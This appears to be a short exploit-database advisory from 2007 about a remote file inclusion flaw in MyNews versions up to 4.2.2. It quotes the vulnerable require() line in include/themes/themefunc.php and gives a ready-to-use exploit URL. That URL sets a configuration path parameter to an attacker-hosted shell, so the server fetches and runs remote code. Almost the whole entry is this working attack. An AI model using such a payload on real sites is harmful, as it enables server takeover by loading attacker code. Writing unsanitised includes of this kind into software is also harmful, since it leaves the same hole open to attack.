id: 1447
date: 01/30/2007
title: MyNews <= 4.2.2 (themefunc.php) Remote File Include Vulnerability
author: GoLd_M
cves: 

=================================================================
MyNews <= 4.2.2 (themefunc.php) Remote File Include Vulnerability
=================================================================



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

MyNews 4.2.2 <=  Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Discovered by GolD_M(Mahmnood_ali)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

V.CODE: In : /include/themes/themefunc.php  <<<<=====>>>>      Line : 2
require($myNewsConf['path']['sys']['index'] .  '/include/libs/modules.lib.php');

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit:
http://www.hedef.com/[mynews_path]/include/themes/themefunc.php?myNewsConf[path][sys][index]=http://sh3LL?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



#  0day.today [2023-03-27]  #